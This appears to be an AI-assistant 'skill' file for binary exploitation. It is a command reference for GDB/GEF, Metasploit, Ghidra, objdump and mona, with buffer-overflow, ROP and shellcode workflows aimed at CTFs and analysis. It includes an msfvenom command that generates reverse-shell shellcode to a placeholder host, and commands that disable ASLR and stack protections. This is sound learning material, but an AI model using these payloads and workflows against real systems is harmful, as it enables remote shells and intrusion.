| name | binary-exploitation-tools |
| description | A comprehensive guide to binary exploitation tools and techniques. Use this skill whenever the user needs help with buffer overflow exploitation, reverse engineering, debugging binaries, or working with tools like GDB, Metasploit, Ghidra, or analyzing vulnerable binaries. Trigger for any binary exploitation task, CTF challenges, vulnerability analysis, or when the user mentions stack overflows, shellcode, ROP gadgets, or binary analysis. |
Binary Exploitation Tools Guide
This skill provides reference material for binary exploitation tools and techniques. Use it to understand tool usage, debug vulnerabilities, and craft exploits.
Metasploit Framework
Pattern Creation and Analysis
pattern_create.rb -l 3000
pattern_offset.rb -l 3000 -q 5f97d534
nasm_shell.rb
nasm> jmp esp
msfelfscan -j esi /opt/fusion/bin/level01
Shellcode Generation
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> \
[EXITFUNC=thread] [-e x86/shikata_ga_nai] \
-b "\x00\x0a\x0d" -f c
GDB Debugger
Installation and Basic Usage
apt-get install gdb
-q
-x <file>
-p <pid>
Core Commands
run
start
n/next/ni
s/step/si
c/continue
quit
p system
set $eip = 0x12345678
disassemble main
disassemble 0x12345678
set disassembly-flavor intel
set follow-fork-mode child
set follow-fork-mode parent
br func
br *func+23
br *0x12345678
del <NUM>
watch EXPRESSION
info functions
info functions func
info registers
bt
bt full
print variable
print 0x87654321 - 0x12345678
x/o 0xDir_hex
x/2x $eip
x/2x $eip -4
x/8xb $eip
i r eip
x/w pointer
x/s pointer
x/xw &pointer
x/i $eip
GDB Enhanced Features (GEF)
GEF is a GDB enhancement plugin with additional features:
help memory
canary
checksec
p system
search-pattern "/bin/sh"
vmmap
xinfo <addr>
memory watch 0x784000 0x1000 byte
memory watch $_got()+0x18 5
format-string-helper
heap-analysis-helper
pattern create 200
pattern search "avaaawaa"
pattern search $rsp
shellcode search x86
shellcode get 61
dump binary memory /tmp/dump.bin 0x200000000 0x20000c350
got
Finding RIP Offset with GEF
gef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
GDB Address Consistency
GDB may show different addresses than the running binary. To ensure consistency:
unset env LINES
unset env COLUMNS
set env _=<absolute_path_to_binary>
Backtrace for Function Flow
For statically linked binaries, use backtrace to identify function flow:
gef➤ bt
GDB Server for Remote Debugging
gdbserver --multi 0.0.0.0:23947
Ghidra Reverse Engineering
Finding Stack Offsets
Ghidra helps identify buffer overflow offsets through local variable positions:
- Local variables are shown with their offset from stack pointer
- Example:
local_bc indicates offset of 0xbc
- If
local_10 is a canary, offset from local_bc to canary is 0xac
- Remember: First 0x08 bytes where RIP is saved belong to RBP
Compilation and Analysis Tools
GCC Compilation Flags
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack \
1.2.c -o 1.2
echo 0 > /proc/sys/kernel/randomize_va_space
nasm -f elf assembly.asm
ld assembly.o -o shellcodeout
Objdump Analysis
objdump -d executable
objdump -d -Mintel executable
objdump -D executable
objdump -t executable
objdump -s -j .dtors executable
objdump -s -j .got executable
objdump -D -s -j .plt executable
objdump -TR executable
objdump -t --dynamic-relo ./exec | grep puts
objdump -D ./exec | grep "VAR_NAME"
Core Dump Analysis
ulimit -c unlimited
sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t
sudo gdb --core=<path/to/core> --quiet
Library and Function Analysis
ldd executable | grep libc.so.6
for i in $(seq 0 20); do ldd <executable> | grep libc; done
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
strace executable
rabin2 -i executable
Immunity Debugger
!mona modules
!mona find -s "\xff\xe4" -m name_unsecure.dll
IDA Pro Remote Debugging
Linux Remote Debug Setup
- Copy
linux_server or linux_server64 from IDA folder to Linux target
- Run on target:
./linux_server64 -Ppass
- In IDA: Debugger → Linux Remote → Process Options
- Configure connection parameters
Practical Workflow
Buffer Overflow Analysis
- Identify vulnerability: Use
checksec or compile with protections disabled
- Find offset: Use pattern creation and GDB/GEF to find exact offset
- Locate useful addresses: Use
objdump, readelf, or strings to find system, /bin/sh
- Craft payload: Combine offset, addresses, and shellcode
- Test: Use GDB to verify exploit works
ROP Chain Construction
- Find gadgets:
objdump -d -Mintel | grep ret
- Locate libc functions:
readelf -s libc.so.6 | grep system
- Find strings:
strings -a -t x libc.so.6 | grep /bin/sh
- Build chain: Stack addresses in correct order
Shellcode Development
- Generate: Use
msfvenom for payloads
- Encode: Use encoders to avoid bad characters
- Test: Assemble with
nasm and verify with objdump
- Integrate: Place at appropriate offset in exploit
Common Pitfalls
- ASLR: Disable with
echo 0 > /proc/sys/kernel/randomize_va_space or use information leak
- Bad characters: Avoid null bytes, newlines, carriage returns in shellcode
- Address changes: GDB addresses may differ from runtime; use consistent environment
- Static binaries: Use backtrace to identify function flow
- Protections: Check with
checksec and disable for testing
Quick Reference
| Tool | Purpose | Key Command |
|---|
| GDB | Debugging | gdb -q ./binary |
| GEF | Enhanced GDB | pattern create 200 |
| Metasploit | Exploitation | msfvenom -p ... |
| Ghidra | Reverse engineering | Analyze local variables |
| Objdump | Binary analysis | objdump -d -Mintel |
| Readelf | ELF analysis | readelf -s |
| Strings | String extraction | strings -a -t x |
| Strace | System call tracing | strace ./binary |